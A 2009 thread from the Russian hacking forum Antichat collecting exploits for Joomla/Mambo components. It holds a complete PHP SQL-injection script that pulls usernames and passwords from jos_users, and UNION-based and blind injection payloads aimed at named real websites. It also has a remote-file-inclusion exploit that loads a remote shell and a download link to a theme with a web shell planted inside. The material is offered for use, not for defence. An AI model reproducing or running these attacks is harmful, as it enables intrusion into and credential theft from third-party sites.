Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

08.08.2009, 12:19
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме: 3370466
Репутация:
96
|
|
Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit
PHP код:
<?php
/*
--------------------------
Joomla <=1.0.15 Component com_pms <=2.0.4 (Ignore-List) SQl-Injection Vuln
--------------------------
Author: M4dhead
Vulnerable joomla component : com_pms
Conditions : magic_quotes_gpc = On or Off it doesn't matter ;)
--------------------------
PREPARATION:
--------------------------
You need a valid Account on the Joomla 1.0.15 Site + Community Builder Suite 1.1.0:
Community Builder Suite 1.1.0:
http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,1175.html
PMS enhanced Version 2.0.4 J 1.0
http://www.make-website.de/script-downlaods?task=summary&cid=123&catid=214
Install Joomla 1.0.15
Install Community Builder
Install PMS Enhanced
Activate the Ignorlist in Components->PMS Enhanced->Config
Tab: Backend -> Ingorlist: Yes
Create a valid User on the target Joomla 1.0.15 System with Community Builder,
login and copy the cookieinformation into the $cookie var below,
adjust the User-Agent on your Post Header dependent on your Browser.
Notice: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
because the cookie-name is dependent on your browser.
--------------------------
USAGE:
--------------------------
Run this script! If there's not shown a page that prompt you to login, the attack was successful.
Then go to the ignore list: www.yourtargetsite.com/index.php?option=com_pms&Itemid=&page=ignore
and you will see some username and passwords in the selectbox :-)
Have fun!!
----------------------------------------------------
*/
$host = "localhost"; //your target Joomla Site
$cookie = "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e14367d5c7298f6c72c"; //replace this with your own cookie values
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n";
//NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
//because the cookie-name is dependent on your browser.
//Don't change anything below
$path = "/joomla/index.php?option=com_pms&Itemid=&page=ignore"; //dont change this
$data_to_send = "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"; //you don't have to change this
print_r($post = PostToHost($host, $path, $cookie, $data_to_send, $useragent));
function PostToHost($host, $path, $cookie, $data_to_send, $useragent) {
$fp = fsockopen($host, 80);
fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "User-Agent: $useragent");
fputs($fp, "Cookie: $cookie\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ". strlen($data_to_send) ."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while(!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
?>
# milw0rm.com [2009-08-07]
|
|
|

10.08.2009, 12:04
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме: 587324
Репутация:
40
|
|
COM_SOBI2
COM_SOBI2
SQL INJECTION
http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml
Проверял только на Joomla_1.0.x
Код:
index.php?option=com_sobi2&sobi2Task=search&Itemid=26
benchmark
в поле поиск вводить
Код:
')and+benchmark(10000000,benchmark(10000000,md5(now())))# a
Обязательно удалить все пробелы
и нажимать поиск)
Последний раз редактировалось FAQ666; 10.08.2009 в 13:28..
|
|
|
Уязвимости компонентов Joomla/Mambo |

10.09.2009, 04:10
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
Уязвимости компонентов Joomla/Mambo
Уязвимость: SQL-Inj
Компонент: The Publications
Уязвимость в файле publications.php
Уязвимый код:
PHP код:
$query = "SELECT * FROM #__content WHERE catid=$id ORDER BY title DESC";
Пример:
Код:
http://www.bscic.gov.bd/index.php?option=com_publications&Itemid=20&lang=en&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|

11.09.2009, 15:57
|
|
Постоянный
Регистрация: 12.04.2008
Сообщений: 403
Провел на форуме: 4700216
Репутация:
261
|
|
|
|
|

11.09.2009, 20:53
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
Уязвимость: SQL-Inj
Компонент: Jeporter
Версия: 2.0
Уязвимость в файле jeporter.php
Уязвимый код:
PHP код:
$cid = mosGetParam( $_REQUEST, 'cid', false);
$sql = "SELECT * FROM #__jeporter WHERE id= ".$cid;
$database->setQuery( $sql );
$report = NULL;
$database->loadObject( $report );
$cid = $report->id;
$title = $report->title;
$jquery = $report->jquery;
$sql = "SELECT * FROM #__jeporter_fields WHERE jeportid= ".$cid;
$database->setQuery( $sql);
$rows = $database->loadObjectList();
Пример:
Код:
http://www.nationalaidsstrategy.org/index.php?option=com_jeporter&task=showreport&cid=-4+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+jos_users--
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|

12.09.2009, 22:51
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме: 5885100
Репутация:
773
|
|
Мож кому пригодится... Тема с шеллом внутри..
после усьановки темы шелл будет в http://site.name/templates/jd_lagoon/ads.php
http://depositfiles.com/files/lhtkdh0m1
Последний раз редактировалось Zitt; 15.09.2009 в 18:31..
|
|
|

13.09.2009, 01:56
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
Уязвимость: Blind SQL-Inj
Компонент: com_clan_members
Версия: 0.9.2.2b
Уязвимость в файле clan_members.html.php
Уязвимый код:
PHP код:
$database->setQuery("SELECT * FROM #__clan_members WHERE id = $id" );
$member = $database -> loadAssocList();
$database->setQuery("SELECT * FROM #__users WHERE id = $id AND block = '0'" );
$usersdata = $database -> loadAssocList();
$database->setQuery("SELECT * FROM #__clan_members_squadperuser WHERE uid=$id" );
$rowsquadperuser = $database -> loadObjectList();
$database->setQuery("SELECT * FROM #__clan_members_comment WHERE memberid=$id" );
$rowmembercomment = $database -> loadObjectList();
$database->setQuery("SELECT * FROM #__clan_members_fields WHERE published=1 ORDER BY ordering" );
$rowmemberfields = $database -> loadObjectList();
#Check if the user is logged in into the side
$database->setQuery("SELECT count(distinct(userid)) as user_online FROM #__session WHERE guest=0 AND userid = $id");
$online = $database->loadResult();
foreach($rowsquadperuser as $squadperuser)
{
$database->setQuery("SELECT * FROM #__clan_members_squad WHERE published = '1' AND id = '$squadperuser->sid'" );
$squadname = $database -> loadAssocList();
if($squadname[0]["squadpicture"] != '' || $squadname[0]["squadname"] != '')
{
$squadpicture_array[$i+1] = $squadname[0]["squadpicture"];
if($i == 0) $squadnames .= $squadname[0]["squadname"]; else $squadnames .= ",".$squadname[0]["squadname"];
$i++;
}
}
Пример:
true ->
Код:
http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=5&task=showClanMemberDetails
false ->
Код:
http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=4&task=showClanMemberDetails
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|

14.09.2009, 15:15
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
Уязвимость: RFI
Компонент: UH_Events
Версия: 0.99.0RC3a
Уязвимость в файле admin.uhevents.php
Требования: register_globals & allow_url_fopen = On
Уязвимый код:
PHP код:
require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php");
Эксплойт:
Код:
.../components/uh_events/admin.uhevents.php?mosConfig_absolute_path=http://shell?
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|

27.09.2009, 16:53
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Уязвимость: SQL
Компонент: Projects
Случайно наткнулся)
Код:
?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
Пример:
http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=27+UNION +SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),Us er()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28--
Сюда же
Уязвимость: SQL
Компонент: com_nodes
Код:
?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
http://www.inab.org/index.php?option=com_nodes&Itemid=61&node=0+union+ select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 27.09.2009 в 17:02..
|
|
|

20.10.2009, 14:24
|
|
Познающий
Регистрация: 31.01.2008
Сообщений: 46
Провел на форуме: 124111
Репутация:
8
|
|
Сканер уязвимостей для Joomla
http://sourceforge.net/projects/joomscan/
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|